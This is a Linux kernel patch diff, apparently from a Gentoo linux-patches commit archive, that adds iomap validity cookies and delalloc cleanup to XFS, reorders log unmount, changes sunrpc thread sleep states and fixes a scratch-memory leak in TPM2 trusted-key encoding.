++static bool
++xfs_iomap_valid(
++	struct inode		*inode,
++	const struct iomap	*iomap)
++{
++	return iomap->validity_cookie ==
++			xfs_iomap_inode_sequence(XFS_I(inode), iomap->flags);
++}
++
++const struct iomap_page_ops xfs_iomap_page_ops = {
++	.iomap_valid		= xfs_iomap_valid,
++};
++
+ int
+ xfs_bmbt_to_iomap(
+ 	struct xfs_inode	*ip,
+ 	struct iomap		*iomap,
+ 	struct xfs_bmbt_irec	*imap,
+ 	unsigned int		mapping_flags,
+-	u16			iomap_flags)
++	u16			iomap_flags,
++	u64			sequence_cookie)
+ {
+ 	struct xfs_mount	*mp = ip->i_mount;
+ 	struct xfs_buftarg	*target = xfs_inode_buftarg(ip);
+@@ -91,6 +123,9 @@ xfs_bmbt_to_iomap(
+ 	if (xfs_ipincount(ip) &&
+ 	    (ip->i_itemp->ili_fsync_fields & ~XFS_ILOG_TIMESTAMP))
+ 		iomap->flags |= IOMAP_F_DIRTY;
++
++	iomap->validity_cookie = sequence_cookie;
++	iomap->page_ops = &xfs_iomap_page_ops;
+ 	return 0;
+ }
+ 
+@@ -195,7 +230,8 @@ xfs_iomap_write_direct(
+ 	xfs_fileoff_t		offset_fsb,
+ 	xfs_fileoff_t		count_fsb,
+ 	unsigned int		flags,
+-	struct xfs_bmbt_irec	*imap)
++	struct xfs_bmbt_irec	*imap,
++	u64			*seq)
+ {
+ 	struct xfs_mount	*mp = ip->i_mount;
+ 	struct xfs_trans	*tp;
+@@ -285,6 +321,7 @@ xfs_iomap_write_direct(
+ 		error = xfs_alert_fsblock_zero(ip, imap);
+ 
+ out_unlock:
++	*seq = xfs_iomap_inode_sequence(ip, 0);
+ 	xfs_iunlock(ip, XFS_ILOCK_EXCL);
+ 	return error;
+ 
+@@ -743,6 +780,7 @@ xfs_direct_write_iomap_begin(
+ 	bool			shared = false;
+ 	u16			iomap_flags = 0;
+ 	unsigned int		lockmode = XFS_ILOCK_SHARED;
++	u64			seq;
+ 
+ 	ASSERT(flags & (IOMAP_WRITE | IOMAP_ZERO));
+ 
+@@ -811,9 +849,10 @@ xfs_direct_write_iomap_begin(
+ 			goto out_unlock;
+ 	}
+ 
++	seq = xfs_iomap_inode_sequence(ip, iomap_flags);
+ 	xfs_iunlock(ip, lockmode);
+ 	trace_xfs_iomap_found(ip, offset, length, XFS_DATA_FORK, &imap);
+-	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, iomap_flags);
++	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, iomap_flags, seq);
+ 
+ allocate_blocks:
+ 	error = -EAGAIN;
+@@ -839,24 +878,26 @@ xfs_direct_write_iomap_begin(
+ 	xfs_iunlock(ip, lockmode);
+ 
+ 	error = xfs_iomap_write_direct(ip, offset_fsb, end_fsb - offset_fsb,
+-			flags, &imap);
++			flags, &imap, &seq);
+ 	if (error)
+ 		return error;
+ 
+ 	trace_xfs_iomap_alloc(ip, offset, length, XFS_DATA_FORK, &imap);
+ 	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags,
+-				 iomap_flags | IOMAP_F_NEW);
++				 iomap_flags | IOMAP_F_NEW, seq);
+ 
+ out_found_cow:
+-	xfs_iunlock(ip, lockmode);
+ 	length = XFS_FSB_TO_B(mp, cmap.br_startoff + cmap.br_blockcount);
+ 	trace_xfs_iomap_found(ip, offset, length - offset, XFS_COW_FORK, &cmap);
+ 	if (imap.br_startblock != HOLESTARTBLOCK) {
+-		error = xfs_bmbt_to_iomap(ip, srcmap, &imap, flags, 0);
++		seq = xfs_iomap_inode_sequence(ip, 0);
++		error = xfs_bmbt_to_iomap(ip, srcmap, &imap, flags, 0, seq);
+ 		if (error)
+-			return error;
++			goto out_unlock;
+ 	}
+-	return xfs_bmbt_to_iomap(ip, iomap, &cmap, flags, IOMAP_F_SHARED);
++	seq = xfs_iomap_inode_sequence(ip, IOMAP_F_SHARED);
++	xfs_iunlock(ip, lockmode);
++	return xfs_bmbt_to_iomap(ip, iomap, &cmap, flags, IOMAP_F_SHARED, seq);
+ 
+ out_unlock:
+ 	if (lockmode)
+@@ -915,6 +956,7 @@ xfs_buffered_write_iomap_begin(
+ 	int			allocfork = XFS_DATA_FORK;
+ 	int			error = 0;
+ 	unsigned int		lockmode = XFS_ILOCK_EXCL;
++	u64			seq;
+ 
+ 	if (xfs_is_shutdown(mp))
+ 		return -EIO;
+@@ -926,6 +968,10 @@ xfs_buffered_write_iomap_begin(
+ 
+ 	ASSERT(!XFS_IS_REALTIME_INODE(ip));
+ 
++	error = xfs_qm_dqattach(ip);
++	if (error)
++		return error;
++
+ 	error = xfs_ilock_for_iomap(ip, flags, &lockmode);
+ 	if (error)
+ 		return error;
+@@ -1029,10 +1075,6 @@ xfs_buffered_write_iomap_begin(
+ 			allocfork = XFS_COW_FORK;
+ 	}
+ 
+-	error = xfs_qm_dqattach_locked(ip, false);
+-	if (error)
+-		goto out_unlock;
+-
+ 	if (eof && offset + count > XFS_ISIZE(ip)) {
+ 		/*
+ 		 * Determine the initial size of the preallocation.
+@@ -1094,32 +1136,47 @@ xfs_buffered_write_iomap_begin(
+ 	 * Flag newly allocated delalloc blocks with IOMAP_F_NEW so we punch
+ 	 * them out if the write happens to fail.
+ 	 */
++	seq = xfs_iomap_inode_sequence(ip, IOMAP_F_NEW);
+ 	xfs_iunlock(ip, XFS_ILOCK_EXCL);
+ 	trace_xfs_iomap_alloc(ip, offset, count, allocfork, &imap);
+-	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, IOMAP_F_NEW);
++	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, IOMAP_F_NEW, seq);
+ 
+ found_imap:
++	seq = xfs_iomap_inode_sequence(ip, 0);
+ 	xfs_iunlock(ip, XFS_ILOCK_EXCL);
+-	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, 0);
++	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, 0, seq);
+ 
+ found_cow:
+-	xfs_iunlock(ip, XFS_ILOCK_EXCL);
++	seq = xfs_iomap_inode_sequence(ip, 0);
+ 	if (imap.br_startoff <= offset_fsb) {
+-		error = xfs_bmbt_to_iomap(ip, srcmap, &imap, flags, 0);
++		error = xfs_bmbt_to_iomap(ip, srcmap, &imap, flags, 0, seq);
+ 		if (error)
+-			return error;
++			goto out_unlock;
++		seq = xfs_iomap_inode_sequence(ip, IOMAP_F_SHARED);
++		xfs_iunlock(ip, XFS_ILOCK_EXCL);
+ 		return xfs_bmbt_to_iomap(ip, iomap, &cmap, flags,
+-					 IOMAP_F_SHARED);
++					 IOMAP_F_SHARED, seq);
+ 	}
+ 
+ 	xfs_trim_extent(&cmap, offset_fsb, imap.br_startoff - offset_fsb);
+-	return xfs_bmbt_to_iomap(ip, iomap, &cmap, flags, 0);
++	xfs_iunlock(ip, XFS_ILOCK_EXCL);
++	return xfs_bmbt_to_iomap(ip, iomap, &cmap, flags, 0, seq);
+ 
+ out_unlock:
+ 	xfs_iunlock(ip, XFS_ILOCK_EXCL);
+ 	return error;
+ }
+ 
++static int
++xfs_buffered_write_delalloc_punch(
++	struct inode		*inode,
++	loff_t			offset,
++	loff_t			length)
++{
++	return xfs_bmap_punch_delalloc_range(XFS_I(inode), offset,
++			offset + length);
++}
++
+ static int
+ xfs_buffered_write_iomap_end(
+ 	struct inode		*inode,
+@@ -1129,56 +1186,17 @@ xfs_buffered_write_iomap_end(
+ 	unsigned		flags,
+ 	struct iomap		*iomap)
+ {
+-	struct xfs_inode	*ip = XFS_I(inode);
+-	struct xfs_mount	*mp = ip->i_mount;
+-	xfs_fileoff_t		start_fsb;
+-	xfs_fileoff_t		end_fsb;
+-	int			error = 0;
+-
+-	if (iomap->type != IOMAP_DELALLOC)
+-		return 0;
+-
+-	/*
+-	 * Behave as if the write failed if drop writes is enabled. Set the NEW
+-	 * flag to force delalloc cleanup.
+-	 */
+-	if (XFS_TEST_ERROR(false, mp, XFS_ERRTAG_DROP_WRITES)) {
+-		iomap->flags |= IOMAP_F_NEW;
+-		written = 0;
+-	}
+ 
+-	/*
+-	 * start_fsb refers to the first unused block after a short write. If
+-	 * nothing was written, round offset down to point at the first block in
+-	 * the range.
+-	 */
+-	if (unlikely(!written))
+-		start_fsb = XFS_B_TO_FSBT(mp, offset);
+-	else
+-		start_fsb = XFS_B_TO_FSB(mp, offset + written);
+-	end_fsb = XFS_B_TO_FSB(mp, offset + length);
++	struct xfs_mount	*mp = XFS_M(inode->i_sb);
++	int			error;
+ 
+-	/*
+-	 * Trim delalloc blocks if they were allocated by this write and we
+-	 * didn't manage to write the whole range.
+-	 *
+-	 * We don't need to care about racing delalloc as we hold i_mutex
+-	 * across the reserve/allocate/unreserve calls. If there are delalloc
+-	 * blocks in the range, they are ours.
+-	 */
+-	if ((iomap->flags & IOMAP_F_NEW) && start_fsb < end_fsb) {
+-		truncate_pagecache_range(VFS_I(ip), XFS_FSB_TO_B(mp, start_fsb),
+-					 XFS_FSB_TO_B(mp, end_fsb) - 1);
+-
+-		error = xfs_bmap_punch_delalloc_range(ip, start_fsb,
+-					       end_fsb - start_fsb);
+-		if (error && !xfs_is_shutdown(mp)) {
+-			xfs_alert(mp, "%s: unable to clean up ino %lld",
+-				__func__, ip->i_ino);
+-			return error;
+-		}
++	error = iomap_file_buffered_write_punch_delalloc(inode, iomap, offset,
++			length, written, &xfs_buffered_write_delalloc_punch);
++	if (error && !xfs_is_shutdown(mp)) {
++		xfs_alert(mp, "%s: unable to clean up ino 0x%llx",
++			__func__, XFS_I(inode)->i_ino);
++		return error;
+ 	}
+-
+ 	return 0;
+ }
+ 
+@@ -1187,6 +1205,15 @@ const struct iomap_ops xfs_buffered_write_iomap_ops = {
+ 	.iomap_end		= xfs_buffered_write_iomap_end,
+ };
+ 
++/*
++ * iomap_page_mkwrite() will never fail in a way that requires delalloc extents
++ * that it allocated to be revoked. Hence we do not need an .iomap_end method
++ * for this operation.
++ */
++const struct iomap_ops xfs_page_mkwrite_iomap_ops = {
++	.iomap_begin		= xfs_buffered_write_iomap_begin,
++};
++
+ static int
+ xfs_read_iomap_begin(
+ 	struct inode		*inode,
+@@ -1204,6 +1231,7 @@ xfs_read_iomap_begin(
+ 	int			nimaps = 1, error = 0;
+ 	bool			shared = false;
+ 	unsigned int		lockmode = XFS_ILOCK_SHARED;
++	u64			seq;
+ 
+ 	ASSERT(!(flags & (IOMAP_WRITE | IOMAP_ZERO)));
+ 
+@@ -1217,13 +1245,14 @@ xfs_read_iomap_begin(
+ 			       &nimaps, 0);
+ 	if (!error && (flags & IOMAP_REPORT))
+ 		error = xfs_reflink_trim_around_shared(ip, &imap, &shared);
++	seq = xfs_iomap_inode_sequence(ip, shared ? IOMAP_F_SHARED : 0);
+ 	xfs_iunlock(ip, lockmode);
+ 
+ 	if (error)
+ 		return error;
+ 	trace_xfs_iomap_found(ip, offset, length, XFS_DATA_FORK, &imap);
+ 	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags,
+-				 shared ? IOMAP_F_SHARED : 0);
++				 shared ? IOMAP_F_SHARED : 0, seq);
+ }
+ 
+ const struct iomap_ops xfs_read_iomap_ops = {
+@@ -1248,6 +1277,7 @@ xfs_seek_iomap_begin(
+ 	struct xfs_bmbt_irec	imap, cmap;
+ 	int			error = 0;
+ 	unsigned		lockmode;
++	u64			seq;
+ 
+ 	if (xfs_is_shutdown(mp))
+ 		return -EIO;
+@@ -1282,8 +1312,9 @@ xfs_seek_iomap_begin(
+ 		if (data_fsb < cow_fsb + cmap.br_blockcount)
+ 			end_fsb = min(end_fsb, data_fsb);
+ 		xfs_trim_extent(&cmap, offset_fsb, end_fsb);
++		seq = xfs_iomap_inode_sequence(ip, IOMAP_F_SHARED);
+ 		error = xfs_bmbt_to_iomap(ip, iomap, &cmap, flags,
+-					  IOMAP_F_SHARED);
++				IOMAP_F_SHARED, seq);
+ 		/*
+ 		 * This is a COW extent, so we must probe the page cache
+ 		 * because there could be dirty page cache being backed
+@@ -1304,8 +1335,9 @@ xfs_seek_iomap_begin(
+ 	imap.br_startblock = HOLESTARTBLOCK;
+ 	imap.br_state = XFS_EXT_NORM;
+ done:
++	seq = xfs_iomap_inode_sequence(ip, 0);
+ 	xfs_trim_extent(&imap, offset_fsb, end_fsb);
+-	error = xfs_bmbt_to_iomap(ip, iomap, &imap, flags, 0);
++	error = xfs_bmbt_to_iomap(ip, iomap, &imap, flags, 0, seq);
+ out_unlock:
+ 	xfs_iunlock(ip, lockmode);
+ 	return error;
+@@ -1331,6 +1363,7 @@ xfs_xattr_iomap_begin(
+ 	struct xfs_bmbt_irec	imap;
+ 	int			nimaps = 1, error = 0;
+ 	unsigned		lockmode;
++	int			seq;
+ 
+ 	if (xfs_is_shutdown(mp))
+ 		return -EIO;
+@@ -1347,12 +1380,14 @@ xfs_xattr_iomap_begin(
+ 	error = xfs_bmapi_read(ip, offset_fsb, end_fsb - offset_fsb, &imap,
+ 			       &nimaps, XFS_BMAPI_ATTRFORK);
+ out_unlock:
++
++	seq = xfs_iomap_inode_sequence(ip, IOMAP_F_XATTR);
+ 	xfs_iunlock(ip, lockmode);
+ 
+ 	if (error)
+ 		return error;
+ 	ASSERT(nimaps);
+-	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, 0);
++	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, IOMAP_F_XATTR, seq);
+ }
+ 
+ const struct iomap_ops xfs_xattr_iomap_ops = {
+diff --git a/fs/xfs/xfs_iomap.h b/fs/xfs/xfs_iomap.h
+index c782e8c0479c0..4da13440bae9b 100644
+--- a/fs/xfs/xfs_iomap.h
++++ b/fs/xfs/xfs_iomap.h
+@@ -13,14 +13,15 @@ struct xfs_bmbt_irec;
+ 
+ int xfs_iomap_write_direct(struct xfs_inode *ip, xfs_fileoff_t offset_fsb,
+ 		xfs_fileoff_t count_fsb, unsigned int flags,
+-		struct xfs_bmbt_irec *imap);
++		struct xfs_bmbt_irec *imap, u64 *sequence);
+ int xfs_iomap_write_unwritten(struct xfs_inode *, xfs_off_t, xfs_off_t, bool);
+ xfs_fileoff_t xfs_iomap_eof_align_last_fsb(struct xfs_inode *ip,
+ 		xfs_fileoff_t end_fsb);
+ 
++u64 xfs_iomap_inode_sequence(struct xfs_inode *ip, u16 iomap_flags);
+ int xfs_bmbt_to_iomap(struct xfs_inode *ip, struct iomap *iomap,
+ 		struct xfs_bmbt_irec *imap, unsigned int mapping_flags,
+-		u16 iomap_flags);
++		u16 iomap_flags, u64 sequence_cookie);
+ 
+ int xfs_zero_range(struct xfs_inode *ip, loff_t pos, loff_t len,
+ 		bool *did_zero);
+@@ -47,6 +48,7 @@ xfs_aligned_fsb_count(
+ }
+ 
+ extern const struct iomap_ops xfs_buffered_write_iomap_ops;
++extern const struct iomap_ops xfs_page_mkwrite_iomap_ops;
+ extern const struct iomap_ops xfs_direct_write_iomap_ops;
+ extern const struct iomap_ops xfs_read_iomap_ops;
+ extern const struct iomap_ops xfs_seek_iomap_ops;
+diff --git a/fs/xfs/xfs_log.c b/fs/xfs/xfs_log.c
+index f02a0dd522b3d..d9aa5eab02c3f 100644
+--- a/fs/xfs/xfs_log.c
++++ b/fs/xfs/xfs_log.c
+@@ -730,15 +730,7 @@ xfs_log_mount(
+ 	 * just worked.
+ 	 */
+ 	if (!xfs_has_norecovery(mp)) {
+-		/*
+-		 * log recovery ignores readonly state and so we need to clear
+-		 * mount-based read only state so it can write to disk.
+-		 */
+-		bool	readonly = test_and_clear_bit(XFS_OPSTATE_READONLY,
+-						&mp->m_opstate);
+ 		error = xlog_recover(log);
+-		if (readonly)
+-			set_bit(XFS_OPSTATE_READONLY, &mp->m_opstate);
+ 		if (error) {
+ 			xfs_warn(mp, "log mount/recovery failed: error %d",
+ 				error);
+@@ -787,7 +779,6 @@ xfs_log_mount_finish(
+ 	struct xfs_mount	*mp)
+ {
+ 	struct xlog		*log = mp->m_log;
+-	bool			readonly;
+ 	int			error = 0;
+ 
+ 	if (xfs_has_norecovery(mp)) {
+@@ -795,12 +786,6 @@ xfs_log_mount_finish(
+ 		return 0;
+ 	}
+ 
+-	/*
+-	 * log recovery ignores readonly state and so we need to clear
+-	 * mount-based read only state so it can write to disk.
+-	 */
+-	readonly = test_and_clear_bit(XFS_OPSTATE_READONLY, &mp->m_opstate);
+-
+ 	/*
+ 	 * During the second phase of log recovery, we need iget and
+ 	 * iput to behave like they do for an active filesystem.
+@@ -850,8 +835,6 @@ xfs_log_mount_finish(
+ 	xfs_buftarg_drain(mp->m_ddev_targp);
+ 
+ 	clear_bit(XLOG_RECOVERY_NEEDED, &log->l_opstate);
+-	if (readonly)
+-		set_bit(XFS_OPSTATE_READONLY, &mp->m_opstate);
+ 
+ 	/* Make sure the log is dead if we're returning failure. */
+ 	ASSERT(!error || xlog_is_shutdown(log));
+@@ -886,6 +869,23 @@ xlog_force_iclog(
+ 	return xlog_state_release_iclog(iclog->ic_log, iclog, NULL);
+ }
+ 
++/*
++ * Cycle all the iclogbuf locks to make sure all log IO completion
++ * is done before we tear down these buffers.
++ */
++static void
++xlog_wait_iclog_completion(struct xlog *log)
++{
++	int		i;
++	struct xlog_in_core	*iclog = log->l_iclog;
++
++	for (i = 0; i < log->l_iclog_bufs; i++) {
++		down(&iclog->ic_sema);
++		up(&iclog->ic_sema);
++		iclog = iclog->ic_next;
++	}
++}
++
+ /*
+  * Wait for the iclog and all prior iclogs to be written disk as required by the
+  * log force state machine. Waiting on ic_force_wait ensures iclog completions
+@@ -1111,6 +1111,14 @@ xfs_log_unmount(
+ {
+ 	xfs_log_clean(mp);
+ 
++	/*
++	 * If shutdown has come from iclog IO context, the log
++	 * cleaning will have been skipped and so we need to wait
++	 * for the iclog to complete shutdown processing before we
++	 * tear anything down.
++	 */
++	xlog_wait_iclog_completion(mp->m_log);
++
+ 	xfs_buftarg_drain(mp->m_ddev_targp);
+ 
+ 	xfs_trans_ail_destroy(mp);
+@@ -2113,17 +2121,6 @@ xlog_dealloc_log(
+ 	xlog_in_core_t	*iclog, *next_iclog;
+ 	int		i;
+ 
+-	/*
+-	 * Cycle all the iclogbuf locks to make sure all log IO completion
+-	 * is done before we tear down these buffers.
+-	 */
+-	iclog = log->l_iclog;
+-	for (i = 0; i < log->l_iclog_bufs; i++) {
+-		down(&iclog->ic_sema);
+-		up(&iclog->ic_sema);
+-		iclog = iclog->ic_next;
+-	}
+-
+ 	/*
+ 	 * Destroy the CIL after waiting for iclog IO completion because an
+ 	 * iclog EIO error will try to shut down the log, which accesses the
+diff --git a/fs/xfs/xfs_mount.c b/fs/xfs/xfs_mount.c
+index e8bb3c2e847e1..fb87ffb48f7fe 100644
+--- a/fs/xfs/xfs_mount.c
++++ b/fs/xfs/xfs_mount.c
+@@ -538,6 +538,20 @@ xfs_check_summary_counts(
+ 	return 0;
+ }
+ 
++static void
++xfs_unmount_check(
++	struct xfs_mount	*mp)
++{
++	if (xfs_is_shutdown(mp))
++		return;
++
++	if (percpu_counter_sum(&mp->m_ifree) >
++			percpu_counter_sum(&mp->m_icount)) {
++		xfs_alert(mp, "ifree/icount mismatch at unmount");
++		xfs_fs_mark_sick(mp, XFS_SICK_FS_COUNTERS);
++	}
++}
++
+ /*
+  * Flush and reclaim dirty inodes in preparation for unmount. Inodes and
+  * internal inode structures can be sitting in the CIL and AIL at this point,
+@@ -1077,6 +1091,7 @@ xfs_unmountfs(
+ 	if (error)
+ 		xfs_warn(mp, "Unable to free reserved block pool. "
+ 				"Freespace may not be correct on next mount.");
++	xfs_unmount_check(mp);
+ 
+ 	xfs_log_unmount(mp);
+ 	xfs_da_unmount(mp);
+diff --git a/fs/xfs/xfs_pnfs.c b/fs/xfs/xfs_pnfs.c
+index 37a24f0f7cd40..38d23f0e703a8 100644
+--- a/fs/xfs/xfs_pnfs.c
++++ b/fs/xfs/xfs_pnfs.c
+@@ -125,6 +125,7 @@ xfs_fs_map_blocks(
+ 	int			nimaps = 1;
+ 	uint			lock_flags;
+ 	int			error = 0;
++	u64			seq;
+ 
+ 	if (xfs_is_shutdown(mp))
+ 		return -EIO;
+@@ -176,6 +177,7 @@ xfs_fs_map_blocks(
+ 	lock_flags = xfs_ilock_data_map_shared(ip);
+ 	error = xfs_bmapi_read(ip, offset_fsb, end_fsb - offset_fsb,
+ 				&imap, &nimaps, bmapi_flags);
++	seq = xfs_iomap_inode_sequence(ip, 0);
+ 
+ 	ASSERT(!nimaps || imap.br_startblock != DELAYSTARTBLOCK);
+ 
+@@ -189,7 +191,7 @@ xfs_fs_map_blocks(
+ 		xfs_iunlock(ip, lock_flags);
+ 
+ 		error = xfs_iomap_write_direct(ip, offset_fsb,
+-				end_fsb - offset_fsb, 0, &imap);
++				end_fsb - offset_fsb, 0, &imap, &seq);
+ 		if (error)
+ 			goto out_unlock;
+ 
+@@ -209,7 +211,7 @@ xfs_fs_map_blocks(
+ 	}
+ 	xfs_iunlock(ip, XFS_IOLOCK_EXCL);
+ 
+-	error = xfs_bmbt_to_iomap(ip, iomap, &imap, 0, 0);
++	error = xfs_bmbt_to_iomap(ip, iomap, &imap, 0, 0, seq);
+ 	*device_generation = mp->m_generation;
+ 	return error;
+ out_unlock:
+diff --git a/include/linux/iomap.h b/include/linux/iomap.h
+index 238a03087e17e..0983dfc9a203c 100644
+--- a/include/linux/iomap.h
++++ b/include/linux/iomap.h
+@@ -49,26 +49,35 @@ struct vm_fault;
+  *
+  * IOMAP_F_BUFFER_HEAD indicates that the file system requires the use of
+  * buffer heads for this mapping.
++ *
++ * IOMAP_F_XATTR indicates that the iomap is for an extended attribute extent
++ * rather than a file data extent.
+  */
+-#define IOMAP_F_NEW		0x01
+-#define IOMAP_F_DIRTY		0x02
+-#define IOMAP_F_SHARED		0x04
+-#define IOMAP_F_MERGED		0x08
+-#define IOMAP_F_BUFFER_HEAD	0x10
+-#define IOMAP_F_ZONE_APPEND	0x20
++#define IOMAP_F_NEW		(1U << 0)
++#define IOMAP_F_DIRTY		(1U << 1)
++#define IOMAP_F_SHARED		(1U << 2)
++#define IOMAP_F_MERGED		(1U << 3)
++#define IOMAP_F_BUFFER_HEAD	(1U << 4)
++#define IOMAP_F_ZONE_APPEND	(1U << 5)
++#define IOMAP_F_XATTR		(1U << 6)
+ 
+ /*
+  * Flags set by the core iomap code during operations:
+  *
+  * IOMAP_F_SIZE_CHANGED indicates to the iomap_end method that the file size
+  * has changed as the result of this write operation.
++ *
++ * IOMAP_F_STALE indicates that the iomap is not valid any longer and the file
++ * range it covers needs to be remapped by the high level before the operation
++ * can proceed.
+  */
+-#define IOMAP_F_SIZE_CHANGED	0x100
++#define IOMAP_F_SIZE_CHANGED	(1U << 8)
++#define IOMAP_F_STALE		(1U << 9)
+ 
+ /*
+  * Flags from 0x1000 up are for file system specific usage:
+  */
+-#define IOMAP_F_PRIVATE		0x1000
++#define IOMAP_F_PRIVATE		(1U << 12)
+ 
+ 
+ /*
+@@ -89,6 +98,7 @@ struct iomap {
+ 	void			*inline_data;
+ 	void			*private; /* filesystem private */
+ 	const struct iomap_page_ops *page_ops;
++	u64			validity_cookie; /* used with .iomap_valid() */
+ };
+ 
+ static inline sector_t iomap_sector(const struct iomap *iomap, loff_t pos)
+@@ -128,6 +138,23 @@ struct iomap_page_ops {
+ 	int (*page_prepare)(struct inode *inode, loff_t pos, unsigned len);
+ 	void (*page_done)(struct inode *inode, loff_t pos, unsigned copied,
+ 			struct page *page);
++
++	/*
++	 * Check that the cached iomap still maps correctly to the filesystem's
++	 * internal extent map. FS internal extent maps can change while iomap
++	 * is iterating a cached iomap, so this hook allows iomap to detect that
++	 * the iomap needs to be refreshed during a long running write
++	 * operation.
++	 *
++	 * The filesystem can store internal state (e.g. a sequence number) in
++	 * iomap->validity_cookie when the iomap is first mapped to be able to
++	 * detect changes between mapping time and whenever .iomap_valid() is
++	 * called.
++	 *
++	 * This is called with the folio over the specified file position held
++	 * locked by the iomap code.
++	 */
++	bool (*iomap_valid)(struct inode *inode, const struct iomap *iomap);
+ };
+ 
+ /*
+@@ -226,6 +253,10 @@ static inline const struct iomap *iomap_iter_srcmap(const struct iomap_iter *i)
+ 
+ ssize_t iomap_file_buffered_write(struct kiocb *iocb, struct iov_iter *from,
+ 		const struct iomap_ops *ops);
++int iomap_file_buffered_write_punch_delalloc(struct inode *inode,
++		struct iomap *iomap, loff_t pos, loff_t length, ssize_t written,
++		int (*punch)(struct inode *inode, loff_t pos, loff_t length));
++
+ int iomap_read_folio(struct folio *folio, const struct iomap_ops *ops);
+ void iomap_readahead(struct readahead_control *, const struct iomap_ops *ops);
+ bool iomap_is_partially_uptodate(struct folio *, size_t from, size_t count);
+diff --git a/net/sunrpc/svc_xprt.c b/net/sunrpc/svc_xprt.c
+index 8117d0e08d5a2..1393eefbf2187 100644
+--- a/net/sunrpc/svc_xprt.c
++++ b/net/sunrpc/svc_xprt.c
+@@ -696,8 +696,8 @@ static int svc_alloc_arg(struct svc_rqst *rqstp)
+ 			/* Made progress, don't sleep yet */
+ 			continue;
+ 
+-		set_current_state(TASK_INTERRUPTIBLE);
+-		if (signalled() || kthread_should_stop()) {
++		set_current_state(TASK_IDLE);
++		if (kthread_should_stop()) {
+ 			set_current_state(TASK_RUNNING);
+ 			return -EINTR;
+ 		}
+@@ -733,7 +733,7 @@ rqst_should_sleep(struct svc_rqst *rqstp)
+ 		return false;
+ 
+ 	/* are we shutting down? */
+-	if (signalled() || kthread_should_stop())
++	if (kthread_should_stop())
+ 		return false;
+ 
+ 	/* are we freezing? */
+@@ -755,11 +755,7 @@ static struct svc_xprt *svc_get_next_xprt(struct svc_rqst *rqstp, long timeout)
+ 	if (rqstp->rq_xprt)
+ 		goto out_found;
+ 
+-	/*
+-	 * We have to be able to interrupt this wait
+-	 * to bring down the daemons ...
+-	 */
+-	set_current_state(TASK_INTERRUPTIBLE);
++	set_current_state(TASK_IDLE);
+ 	smp_mb__before_atomic();
+ 	clear_bit(SP_CONGESTED, &pool->sp_flags);
+ 	clear_bit(RQ_BUSY, &rqstp->rq_flags);
+@@ -781,7 +777,7 @@ static struct svc_xprt *svc_get_next_xprt(struct svc_rqst *rqstp, long timeout)
+ 	if (!time_left)
+ 		atomic_long_inc(&pool->sp_stats.threads_timedout);
+ 
+-	if (signalled() || kthread_should_stop())
++	if (kthread_should_stop())
+ 		return ERR_PTR(-EINTR);
+ 	return ERR_PTR(-EAGAIN);
+ out_found:
+@@ -879,7 +875,7 @@ int svc_recv(struct svc_rqst *rqstp, long timeout)
+ 	try_to_freeze();
+ 	cond_resched();
+ 	err = -EINTR;
+-	if (signalled() || kthread_should_stop())
++	if (kthread_should_stop())
+ 		goto out;
+ 
+ 	xprt = svc_get_next_xprt(rqstp, timeout);
+diff --git a/security/keys/trusted-keys/trusted_tpm2.c b/security/keys/trusted-keys/trusted_tpm2.c
+index bc700f85f80be..ea277c55a38db 100644
+--- a/security/keys/trusted-keys/trusted_tpm2.c
++++ b/security/keys/trusted-keys/trusted_tpm2.c
+@@ -38,6 +38,7 @@ static int tpm2_key_encode(struct trusted_key_payload *payload,
+ 	u8 *end_work = scratch + SCRATCH_SIZE;
+ 	u8 *priv, *pub;
+ 	u16 priv_len, pub_len;
++	int ret;
+ 
+ 	priv_len = get_unaligned_be16(src) + 2;
+ 	priv = src;
+@@ -57,8 +58,10 @@ static int tpm2_key_encode(struct trusted_key_payload *payload,
+ 		unsigned char bool[3], *w = bool;
+ 		/* tag 0 is emptyAuth */
+ 		w = asn1_encode_boolean(w, w + sizeof(bool), true);
+-		if (WARN(IS_ERR(w), "BUG: Boolean failed to encode"))
+-			return PTR_ERR(w);
++		if (WARN(IS_ERR(w), "BUG: Boolean failed to encode")) {
++			ret = PTR_ERR(w);
++			goto err;
++		}
+ 		work = asn1_encode_tag(work, end_work, 0, bool, w - bool);
+ 	}
+ 
+@@ -69,8 +72,10 @@ static int tpm2_key_encode(struct trusted_key_payload *payload,
+ 	 * trigger, so if it does there's something nefarious going on
+ 	 */
+ 	if (WARN(work - scratch + pub_len + priv_len + 14 > SCRATCH_SIZE,
+-		 "BUG: scratch buffer is too small"))
+-		return -EINVAL;
++		 "BUG: scratch buffer is too small")) {
++		ret = -EINVAL;
++		goto err;
++	}
+ 
+ 	work = asn1_encode_integer(work, end_work, options->keyhandle);
+ 	work = asn1_encode_octet_string(work, end_work, pub, pub_len);
+@@ -79,10 +84,18 @@ static int tpm2_key_encode(struct trusted_key_payload *payload,
+ 	work1 = payload->blob;
+ 	work1 = asn1_encode_sequence(work1, work1 + sizeof(payload->blob),
+ 				     scratch, work - scratch);
+-	if (WARN(IS_ERR(work1), "BUG: ASN.1 encoder failed"))
+-		return PTR_ERR(work1);
++	if (IS_ERR(work1)) {
++		ret = PTR_ERR(work1);
++		pr_err("BUG: ASN.1 encoder failed with %d\n", ret);
++		goto err;
++	}
+ 
++	kfree(scratch);
+ 	return work1 - payload->blob;
++
++err:
++	kfree(scratch);
++	return ret;
+ }
+ 
+ struct tpm2_key_context {


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-05-17 11:36 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-05-17 11:36 UTC (permalink / raw
  To: gentoo-commits

commit:     2a5c10652268bf133990da069fc2ac7e72e4a50d
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri May 17 11:36:21 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri May 17 11:36:21 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2a5c1065

Linux patch 6.1.91

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
